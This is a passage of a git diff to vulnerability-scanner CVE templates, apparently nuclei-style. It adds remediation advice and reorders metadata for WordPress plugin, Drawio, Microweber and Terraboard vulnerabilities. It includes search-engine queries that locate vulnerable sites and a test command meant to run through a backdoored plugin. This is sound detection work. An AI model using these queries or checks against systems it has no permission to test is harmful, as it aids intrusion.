epss-score: 0.01182 - cpe: cpe:2.3:a:commoninja:videos_sync_pdf:*:*:*:*:*:wordpress:*:* epss-percentile: 0.83293 + cpe: cpe:2.3:a:commoninja:videos_sync_pdf:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: commoninja product: videos_sync_pdf + framework: wordpress tags: lfi,wp-plugin,unauth,wpscan,cve,cve2022,packetstorm,wp,wordpress http: diff --git a/http/cves/2022/CVE-2022-1398.yaml b/http/cves/2022/CVE-2022-1398.yaml index ea8e1b5749..1ab74a1b0b 100644 --- a/http/cves/2022/CVE-2022-1398.yaml +++ b/http/cves/2022/CVE-2022-1398.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress External Media without Import plugin through 1.1.2 is susceptible to authenticated blind server-side request forgery. The plugin has no authorization and does not ensure that media added via URLs are external media, which can allow any authenticated users, including subscribers, to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + remediation: | + Upgrade to External Media without Import plugin version 1.1.2 or later. reference: - https://wpscan.com/vulnerability/5440d177-e995-403e-b2c9-42ceda14579e - https://wordpress.org/plugins/external-media-without-import/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-1398 cwe-id: CWE-918 epss-score: 0.0048 - cpe: cpe:2.3:a:external_media_without_import_project:external_media_without_import:*:*:*:*:*:wordpress:*:* epss-percentile: 0.72781 + cpe: cpe:2.3:a:external_media_without_import_project:external_media_without_import:*:*:*:*:*:wordpress:*:* metadata: - max-request: 3 verified: true - framework: wordpress + max-request: 3 vendor: external_media_without_import_project product: external_media_without_import + framework: wordpress tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,wpscan,external-media-without-import,authenticated,intrusive http: diff --git a/http/cves/2022/CVE-2022-1439.yaml b/http/cves/2022/CVE-2022-1439.yaml index 789f35f5d3..bc83c444d0 100644 --- a/http/cves/2022/CVE-2022-1439.yaml +++ b/http/cves/2022/CVE-2022-1439.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Microweber prior to 1.2.15 contains a reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to Microweber CMS version 1.2.15 or later, which includes proper input sanitization to mitigate the XSS vulnerability. reference: - https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0/ - https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0 @@ -16,13 +18,13 @@ info: cve-id: CVE-2022-1439 cwe-id: CWE-79 epss-score: 0.00113 - cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* epss-percentile: 0.44027 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.favicon.hash:780351152 vendor: microweber product: microweber + shodan-query: http.favicon.hash:780351152 tags: cve,cve2022,microweber,xss,huntr http: diff --git a/http/cves/2022/CVE-2022-1442.yaml b/http/cves/2022/CVE-2022-1442.yaml index 4a693ec9e3..2083cd5643 100644 --- a/http/cves/2022/CVE-2022-1442.yaml +++ b/http/cves/2022/CVE-2022-1442.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Metform plugin through 2.1.3 is susceptible to information disclosure due to improper access control in the ~/core/forms/action.php file. An attacker can view all API keys and secrets of integrated third-party APIs such as that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more. + remediation: | + Upgrade to the latest version of the Metform plugin (>=2.1.4) to fix the information disclosure vulnerability. reference: - https://gist.github.com/Xib3rR4dAr/6e6c6e5fa1f8818058c7f03de1eda6bf - https://wpscan.com/vulnerability/9f3fcdd4-9ddc-45d5-a4af-e58634813c2b @@ -18,15 +20,15 @@ info: cve-id: CVE-2022-1442 cwe-id: CWE-862 epss-score: 0.07166 - cpe: cpe:2.3:a:wpmet:metform_elementor_contact_form_builder:*:*:*:*:*:wordpress:*:* epss-percentile: 0.93146 + cpe: cpe:2.3:a:wpmet:metform_elementor_contact_form_builder:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 - google-query: inurl:/wp-content/plugins/metform verified: true - framework: wordpress + max-request: 2 vendor: wpmet product: metform_elementor_contact_form_builder + framework: wordpress + google-query: inurl:/wp-content/plugins/metform tags: wpscan,cve2022,wordpress,wp-plugin,disclosure,unauth,metform,cve,wp http: diff --git a/http/cves/2022/CVE-2022-1574.yaml b/http/cves/2022/CVE-2022-1574.yaml index e4f850a1d0..a43451a65f 100644 --- a/http/cves/2022/CVE-2022-1574.yaml +++ b/http/cves/2022/CVE-2022-1574.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress HTML2WP plugin through 1.0.0 contains an arbitrary file upload vulnerability. The plugin does not perform authorization and CSRF checks when importing files and does not validate them. As a result, an attacker can upload arbitrary files on the remote server. + remediation: | + Update to the latest version of the plugin or remove it if not needed. reference: - https://wpscan.com/vulnerability/c36d0ea8-bf5c-4af9-bd3d-911eb02adc14 - https://wordpress.org/plugins/html2wp/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-1574 cwe-id: CWE-352 epss-score: 0.02682 - cpe: cpe:2.3:a:html2wp_project:html2wp:*:*:*:*:*:wordpress:*:* epss-percentile: 0.89096 + cpe: cpe:2.3:a:html2wp_project:html2wp:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: html2wp_project product: html2wp + framework: wordpress tags: wp-plugin,wp,fileupload,unauth,wpscan,cve2022,wordpress,intrusive,cve,html2wp http: diff --git a/http/cves/2022/CVE-2022-1595.yaml b/http/cves/2022/CVE-2022-1595.yaml index 26b4d3968d..1e6b7b30f2 100644 --- a/http/cves/2022/CVE-2022-1595.yaml +++ b/http/cves/2022/CVE-2022-1595.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress HC Custom WP-Admin URL plugin through 1.4 leaks the secret login URL when sending a specially crafted request, thereby allowing an attacker to discover the administrative login URL. + remediation: | + Update to the latest version of WordPress HC Custom WP-Admin URL plugin (>=1.5) to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/0218c90c-8f79-4f37-9a6f-60cf2f47d47b - https://wordpress.org/plugins/hc-custom-wp-admin-url/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-1595 cwe-id: CWE-200 epss-score: 0.0018 - cpe: cpe:2.3:a:hc_custom_wp-admin_url_project:hc_custom_wp-admin_url:*:*:*:*:*:wordpress:*:* epss-percentile: 0.54465 + cpe: cpe:2.3:a:hc_custom_wp-admin_url_project:hc_custom_wp-admin_url:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: hc_custom_wp-admin_url_project product: hc_custom_wp-admin_url + framework: wordpress tags: unauth,wpscan,cve,cve2022,wordpress,wp-plugin,wp,hc-custom-wp-admin-url http: diff --git a/http/cves/2022/CVE-2022-1597.yaml b/http/cves/2022/CVE-2022-1597.yaml index 8d7db98bf4..4c36fb577a 100644 --- a/http/cves/2022/CVE-2022-1597.yaml +++ b/http/cves/2022/CVE-2022-1597.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress WPQA plugin prior to 5.4 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter on its reset password form. + remediation: | + Upgrade WordPress WPQA to version 5.4 or later, which includes proper input sanitization to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/faff9484-9fc7-4300-bdad-9cd8a30a9a4e - https://nvd.nist.gov/vuln/detail/CVE-2022-1597 @@ -15,15 +17,15 @@ info: cve-id: CVE-2022-1597 cwe-id: CWE-79 epss-score: 0.00252 - cpe: cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:* epss-percentile: 0.62319 + cpe: cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 - google-query: inurl:/wp-content/plugins/wpqa verified: true - framework: wordpress + max-request: 2 vendor: 2code product: wpqa_builder + framework: wordpress + google-query: inurl:/wp-content/plugins/wpqa tags: wpscan,xss,wordpress,wp-plugin,wp,cve,cve2022,wpqa variables: user: "{{to_lower(rand_base(5))}}" diff --git a/http/cves/2022/CVE-2022-1598.yaml b/http/cves/2022/CVE-2022-1598.yaml index 6bb2f4d395..74b9c4a67b 100644 --- a/http/cves/2022/CVE-2022-1598.yaml +++ b/http/cves/2022/CVE-2022-1598.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress WPQA plugin before 5.5 is susceptible to improper access control. The plugin lacks authentication in a REST API endpoint. An attacker can potentially discover private questions sent between users on the site. + remediation: | + Update the WPQA plugin to version 5.5 or later to fix the improper access control issue. reference: - https://wpscan.com/vulnerability/0416ae2f-5670-4080-a88d-3484bb19d8c8 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1598 @@ -16,15 +18,15 @@ info: cve-id: CVE-2022-1598 cwe-id: CWE-306 epss-score: 0.02766 - cpe: cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:* epss-percentile: 0.89258 + cpe: cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - google-query: inurl:/wp-content/plugins/wpqa verified: true - framework: wordpress + max-request: 1 vendor: 2code product: wpqa_builder + framework: wordpress + google-query: inurl:/wp-content/plugins/wpqa tags: cve,cve2022,wordpress,wp-plugin,wpqa,idor,wpscan http: diff --git a/http/cves/2022/CVE-2022-1609.yaml b/http/cves/2022/CVE-2022-1609.yaml index 2f24f3a371..3a9ad551ce 100644 --- a/http/cves/2022/CVE-2022-1609.yaml +++ b/http/cves/2022/CVE-2022-1609.yaml @@ -5,6 +5,8 @@ info: author: For3stCo1d severity: critical description: The School Management plugin before version 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site. + remediation: | + Upgrade The School Management to version 9.9.7 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/e2d546c9-85b6-47a4-b951-781b9ae5d0f2 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1609 @@ -14,8 +16,8 @@ info: cve-id: CVE-2022-1609 cwe-id: CWE-77 metadata: - max-request: 1 verified: false + max-request: 1 tags: rce,wp,backdoor,wpscan,cve,cve2022,wordpress variables: cmd: "echo CVE-2022-1609 | rev" diff --git a/http/cves/2022/CVE-2022-1713.yaml b/http/cves/2022/CVE-2022-1713.yaml index 30d7c9b456..a8e0c7fafa 100644 --- a/http/cves/2022/CVE-2022-1713.yaml +++ b/http/cves/2022/CVE-2022-1713.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Drawio prior to 18.0.4 is vulnerable to server-side request forgery. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information. + remediation: | + Upgrade Drawio to version 18.0.4 or later to mitigate the SSRF vulnerability. reference: - https://huntr.dev/bounties/cad3902f-3afb-4ed2-abd0-9f96a248de11 - https://github.com/jgraph/drawio/commit/283d41ec80ad410d68634245cf56114bc19331ee @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-1713 cwe-id: CWE-918 epss-score: 0.00967 - cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:* epss-percentile: 0.81398 + cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: http.title:"Flowchart Maker" + max-request: 1 vendor: diagrams product: drawio + shodan-query: http.title:"Flowchart Maker" tags: drawio,ssrf,oss,huntr,cve,cve2022 http: diff --git a/http/cves/2022/CVE-2022-1724.yaml b/http/cves/2022/CVE-2022-1724.yaml index 5f2d3d7231..d3afaecb08 100644 --- a/http/cves/2022/CVE-2022-1724.yaml +++ b/http/cves/2022/CVE-2022-1724.yaml @@ -5,6 +5,8 @@ info: author: Akincibor severity: medium description: WordPress Simple Membership plugin before 4.1.1 contains a reflected cross-site scripting vulnerability. It does not properly sanitize and escape parameters before outputting them back in AJAX actions. + remediation: | + Update to the latest version of WordPress Simple Membership plugin (4.1.1 or higher) to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/96a0a667-9c4b-4ea6-b78a-0681e9a9bbae - https://nvd.nist.gov/vuln/detail/CVE-2022-1724 @@ -14,14 +16,14 @@ info: cve-id: CVE-2022-1724 cwe-id: CWE-79 epss-score: 0.00119 - cpe: cpe:2.3:a:simple-membership-plugin:simple_membership:*:*:*:*:*:wordpress:*:* epss-percentile: 0.45304 + cpe: cpe:2.3:a:simple-membership-plugin:simple_membership:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: simple-membership-plugin product: simple_membership + framework: wordpress tags: xss,wp,wordpress,wpscan,cve,cve2022,wp-plugin http: diff --git a/http/cves/2022/CVE-2022-1756.yaml b/http/cves/2022/CVE-2022-1756.yaml index 66bd61419d..74faa9bf0c 100644 --- a/http/cves/2022/CVE-2022-1756.yaml +++ b/http/cves/2022/CVE-2022-1756.yaml @@ -6,26 +6,26 @@ info: severity: medium description: | The Newsletter WordPress plugin before 7.4.5 does not sanitize and escape the $_SERVER['REQUEST_URI'] before echoing it back in admin pages. Although this uses addslashes, and most modern browsers automatically URLEncode requests, this is still vulnerable to Reflected XSS in older browsers such as Internet Explorer 9 or below. + remediation: Fixed in version 7.4.5 reference: - https://wpscan.com/vulnerability/6ad407fe-db2b-41fb-834b-dd8c4f62b072 - https://nvd.nist.gov/vuln/detail/CVE-2022-1756 - https://wordpress.org/plugins/newsletter/ - remediation: Fixed in version 7.4.5 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-1756 cwe-id: CWE-79 epss-score: 0.00099 - cpe: cpe:2.3:a:thenewsletterplugin:newsletter:*:*:*:*:*:wordpress:*:* epss-percentile: 0.40272 + cpe: cpe:2.3:a:thenewsletterplugin:newsletter:*:*:*:*:*:wordpress:*:* metadata: verified: true - publicwww-query: "/wp-content/plugins/newsletter/" max-request: 2 - framework: wordpress vendor: thenewsletterplugin product: newsletter + framework: wordpress + publicwww-query: "/wp-content/plugins/newsletter/" tags: wpscan,cve,cve2022,newsletter,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-1768.yaml b/http/cves/2022/CVE-2022-1768.yaml index f6f92d056e..90b7b34835 100644 --- a/http/cves/2022/CVE-2022-1768.yaml +++ b/http/cves/2022/CVE-2022-1768.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress RSVPMaker plugin through 9.3.2 contains a SQL injection vulnerability due to insufficient escaping and parameterization on user-supplied data passed to multiple SQL queries in ~/rsvpmaker-email.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update to the latest version of the RSVPMaker plugin (9.3.3 or higher) to mitigate the SQL Injection vulnerability. reference: - https://gist.github.com/Xib3rR4dAr/441d6bb4a5b8ad4b25074a49210a02cc - https://wordpress.org/plugins/rsvpmaker/ @@ -18,14 +20,14 @@ info: cve-id: CVE-2022-1768 cwe-id: CWE-89 epss-score: 0.63139 - cpe: cpe:2.3:a:rsvpmaker_project:rsvpmaker:*:*:*:*:*:wordpress:*:* epss-percentile: 0.97399 + cpe: cpe:2.3:a:rsvpmaker_project:rsvpmaker:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: rsvpmaker_project product: rsvpmaker + framework: wordpress tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,rsvpmaker http: diff --git a/http/cves/2022/CVE-2022-1815.yaml b/http/cves/2022/CVE-2022-1815.yaml index d1fc8cd683..a57d06af93 100644 --- a/http/cves/2022/CVE-2022-1815.yaml +++ b/http/cves/2022/CVE-2022-1815.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Drawio before 18.1.2 is susceptible to server-side request forgery via the /service endpoint in jgraph/drawio. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade Drawio to version 18.1.2 or later to mitigate the SSRF vulnerability. reference: - https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f/ - https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f @@ -17,11 +19,11 @@ info: cve-id: CVE-2022-1815 cwe-id: CWE-918,CWE-200 epss-score: 0.0087 - cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:* epss-percentile: 0.80286 + cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: diagrams product: drawio tags: huntr,cve,cve2022,drawio,ssrf,oast,oss,jgraph diff --git a/http/cves/2022/CVE-2022-1883.yaml b/http/cves/2022/CVE-2022-1883.yaml index bf639ebac9..b4d3bfca51 100644 --- a/http/cves/2022/CVE-2022-1883.yaml +++ b/http/cves/2022/CVE-2022-1883.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Terraboard prior to 2.2.0 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade Terraboard to version 2.2.0 or later to mitigate the SQL Injection vulnerability. reference: - https://huntr.dev/bounties/a25d15bd-cd23-487e-85cd-587960f1b9e7/ - https://github.com/camptocamp/terraboard/commit/2a5dbaac015dc0714b41a59995e24f5767f89ddc @@ -17,8 +19,8 @@ info: cve-id: CVE-2022-1883 cwe-id: CWE-89 epss-score: 0.12349 - cpe: cpe:2.3:a:camptocamp:terraboard:*:*:*:*:*:*:*:* epss-percentile: 0.94679 + cpe: cpe:2.3:a:camptocamp:terraboard:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: camptocamp diff --git a/http/cves/2022/CVE-2022-1903.yaml b/http/cves/2022/CVE-2022-1903.yaml index d95ec4861f..35cedcdb7e 100644 --- a/http/cves/2022/CVE-2022-1903.yaml +++ b/http/cves/2022/CVE-2022-1903.yaml @@ -6,25 +6,25 @@ info: severity: high description: | The ARMember WordPress plugin before 3.4.8 is vulnerable to account takeover (even the administrator) due to missing nonce and authorization checks in an AJAX action available to unauthenticated users, allowing them to change the password of arbitrary users by knowing their username. + remediation: Fixed in version 3.4.8 reference: - https://wpscan.com/vulnerability/28d26aa6-a8db-4c20-9ec7-39821c606a08 - https://wordpress.org/plugins/armember-membership/ - https://nvd.nist.gov/vuln/detail/CVE-2022-1903 - remediation: Fixed in version 3.4.8 classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2022-1903 cwe-id: CWE-862 epss-score: 0.31334 - cpe: cpe:2.3:a:armemberplugin:armember:*:*:*:*:*:wordpress:*:* epss-percentile: 0.96409 + cpe: cpe:2.3:a:armemberplugin:armember:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: armemberplugin product: armember + framework: wordpress tags: cve,cve2022,account-takeover,wpscan,wordpress,wp-plugin,wp,armember-membership,unauthenticated http: diff --git a/http/cves/2022/CVE-2022-1904.yaml b/http/cves/2022/CVE-2022-1904.yaml index 4ceca94931..b687e89862 100644 --- a/http/cves/2022/CVE-2022-1904.yaml +++ b/http/cves/2022/CVE-2022-1904.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Easy Pricing Tables plugin before 3.2.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before reflecting it back in a page available to any user both authenticated and unauthenticated when a specific setting is enabled. + remediation: | + Update to the latest version of WordPress Easy Pricing Tables plugin (3.2.1) to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/92215d07-d129-49b4-a838-0de1a944c06b - https://nvd.nist.gov/vuln/detail/CVE-2022-1904 @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-1904 cwe-id: CWE-79 epss-score: 0.00097 - cpe: cpe:2.3:a:fatcatapps:easy_pricing_tables:*:*:*:*:*:wordpress:*:* epss-percentile: 0.39802 + cpe: cpe:2.3:a:fatcatapps:easy_pricing_tables:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: fatcatapps product: easy_pricing_tables + framework: wordpress tags: wp,wordpress,wpscan,cve,cve2022,wp-plugin,xss http: diff --git a/http/cves/2022/CVE-2022-1906.yaml b/http/cves/2022/CVE-2022-1906.yaml index 0acc0e73ea..a4e754dfac 100644 --- a/http/cves/2022/CVE-2022-1906.yaml +++ b/http/cves/2022/CVE-2022-1906.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Copyright Proof plugin 4.16 and prior contains a cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back via an AJAX action available to both unauthenticated and authenticated users when a specific setting is enabled. + remediation: | + Update to the latest version of WordPress Copyright Proof plugin (>=4.17) which includes proper input sanitization and validation. reference: - https://wpscan.com/vulnerability/af4f459e-e60b-4384-aad9-0dc18aa3b338 - https://nvd.nist.gov/vuln/detail/CVE-2022-1906 @@ -15,15 +17,15 @@ info: cve-id: CVE-2022-1906 cwe-id: CWE-79 epss-score: 0.001 - cpe: cpe:2.3:a:digiprove:copyright_proof:*:*:*:*:*:wordpress:*:* epss-percentile: 0.40471 + cpe: cpe:2.3:a:digiprove:copyright_proof:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - google-query: inurl:/wp-content/plugins/digiproveblog verified: true - framework: wordpress + max-request: 1 vendor: digiprove product: copyright_proof + framework: wordpress + google-query: inurl:/wp-content/plugins/digiproveblog tags: wordpress,xss,wp-plugin,wp,wpscan,cve,cve2022 http: diff --git a/http/cves/2022/CVE-2022-1910.yaml b/http/cves/2022/CVE-2022-1910.yaml index 7954c5798e..672da1aead 100644 --- a/http/cves/2022/CVE-2022-1910.yaml +++ b/http/cves/2022/CVE-2022-1910.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Shortcodes and extra features plugin for the Phlox theme before 2.9.8 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the response. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress Shortcodes and Extra Features for Phlox plugin (2.9.8 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/8afe1638-66fa-44c7-9d02-c81573193b47 - https://wordpress.org/plugins/auxin-elements/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-1910 cwe-id: CWE-79 epss-score: 0.00119 - cpe: cpe:2.3:a:averta:shortcodes_and_extra_features_for_phlox_theme:*:*:*:*:*:wordpress:*:* epss-percentile: 0.45304 + cpe: cpe:2.3:a:averta:shortcodes_and_extra_features_for_phlox_theme:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: averta product: shortcodes_and_extra_features_for_phlox_theme + framework: wordpress tags: wordpress,xss,auxin-elements,wpscan,cve,cve2017,wp-plugin,wp http: diff --git a/http/cves/2022/CVE-2022-1916.yaml b/http/cves/2022/CVE-2022-1916.yaml index 6bd8b97fca..d24d3ae0b7 100644 --- a/http/cves/2022/CVE-2022-1916.yaml +++ b/http/cves/2022/CVE-2022-1916.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Active Products Tables for WooCommerce plugin prior to 1.0.5 contains a cross-site scripting vulnerability.. The plugin does not sanitize and escape a parameter before outputting it back in the response of an AJAX action, An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to version 1.0.5 or later of the WordPress Active Products Tables for WooCommerce plugin to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/d16a0c3d-4318-4ecd-9e65-fc4165af8808 - https://nvd.nist.gov/vuln/detail/CVE-2022-1916 @@ -15,13 +17,13 @@ info: cve-id: CVE-2022-1916 cwe-id: CWE-79 epss-score: 0.00097 - cpe: cpe:2.3:a:pluginus:active_products_tables_for_woocommerce:*:*:*:*:*:wordpress:*:* epss-percentile: 0.39802 + cpe: cpe:2.3:a:pluginus:active_products_tables_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: pluginus product: active_products_tables_for_woocommerce + framework: wordpress tags: wordpress,wp-plugin,xss,wpscan,cve,cve2022,wp http: diff --git a/http/cves/2022/CVE-2022-1933.yaml b/http/cves/2022/CVE-2022-1933.yaml index 5a2bc04f0c..d8ff658180 100644 --- a/http/cves/2022/CVE-2022-1933.yaml +++ b/http/cves/2022/CVE-2022-1933.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress CDI plugin prior to 5.1.9 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the response of an AJAX action. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade WordPress to version 5.1.9 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/6cedb27f-6140-4cba-836f-63de98e521bf - https://wordpress.org/plugins/collect-and-deliver-interface-for-woocommerce/advanced/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-1933 cwe-id: CWE-79 epss-score: 0.00097 - cpe: cpe:2.3:a:collect_and_deliver_interface_for_woocommerce_project:collect_and_deliver_interface_for_woocommerce:*:*:*:*:*:wordpress:*:* epss-percentile: 0.39802 + cpe: cpe:2.3:a:collect_and_deliver_interface_for_woocommerce_project:collect_and_deliver_interface_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: collect_and_deliver_interface_for_woocommerce_project product: collect_and_deliver_interface_for_woocommerce + framework: wordpress tags: cdi,wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss http: diff --git a/http/cves/2022/CVE-2022-1937.yaml b/http/cves/2022/CVE-2022-1937.yaml index 8e1fbee0e0..2d61c9ade9 100644 --- a/http/cves/2022/CVE-2022-1937.yaml +++ b/http/cves/2022/CVE-2022-1937.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Awin Data Feed plugin 1.6 and prior contains a cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back via an AJAX action, available to both unauthenticated and authenticated users. + remediation: | + Update to the latest version of the WordPress Awin Data Feed plugin (1.6 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/eb40ea5d-a463-4947-9a40-d55911ff50e9 - https://nvd.nist.gov/vuln/detail/CVE-2022-1937 @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-1937 cwe-id: CWE-79 epss-score: 0.00097 - cpe: cpe:2.3:a:awin:awin_data_feed:*:*:*:*:*:wordpress:*:* epss-percentile: 0.39802 + cpe: cpe:2.3:a:awin:awin_data_feed:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: awin product: awin_data_feed + framework: wordpress tags: cve,cve2022,xss,awin,wpscan,wp-plugin,wp,wordpress,authenticated http: diff --git a/http/cves/2022/CVE-2022-1946.yaml b/http/cves/2022/CVE-2022-1946.yaml index 22260c128a..175bc08c6b 100644 --- a/http/cves/2022/CVE-2022-1946.yaml +++ b/http/cves/2022/CVE-2022-1946.yaml @@ -5,6 +5,8 @@ info: author: Akincibor severity: medium description: WordPress Gallery plugin before 2.0.0 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back in the response of an AJAX action, available to both unauthenticated and authenticated users. + remediation: | + Update the WordPress Gallery plugin to version 2.0.0 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/0903920c-be2e-4515-901f-87253eb30940 - https://wordpress.org/plugins/gallery-album @@ -15,15 +17,15 @@ info: cve-id: CVE-2022-1946 cwe-id: CWE-79 epss-score: 0.00097 - cpe: cpe:2.3:a:wpdevart:gallery:*:*:*:*:*:wordpress:*:* epss-percentile: 0.39802 + cpe: cpe:2.3:a:wpdevart:gallery:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - google-query: inurl:"/wp-content/plugins/gallery-album/" verified: true - framework: wordpress + max-request: 1 vendor: wpdevart product: gallery + framework: wordpress + google-query: inurl:"/wp-content/plugins/gallery-album/" tags: wpscan,cve2022,wp,xss,wordpress,gallery,unauth,cve,wp-plugin http: diff --git a/http/cves/2022/CVE-2022-1952.yaml b/http/cves/2022/CVE-2022-1952.yaml index 0ec4a6eea1..38b9311924 100644 --- a/http/cves/2022/CVE-2022-1952.yaml +++ b/http/cves/2022/CVE-2022-1952.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress eaSync Booking plugin bundle for hotel, restaurant and car rental before 1.1.16 is susceptible to arbitrary file upload. The plugin contains insufficient input validation of an AJAX action. An allowlist of valid file extensions is defined but is not used during the validation steps. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update to the latest version of the WordPress eaSYNC Booking plugin (1.1.16) or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/ecf61d17-8b07-4cb6-93a8-64c2c4fbbe04 - https://wordpress.org/plugins/easync-booking/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-1952 cwe-id: CWE-434 epss-score: 0.95933 - cpe: cpe:2.3:a:syntactics:free_booking_plugin_for_hotels\,_restaurant_and_car_rental:*:*:*:*:*:wordpress:*:* epss-percentile: 0.99225 + cpe: 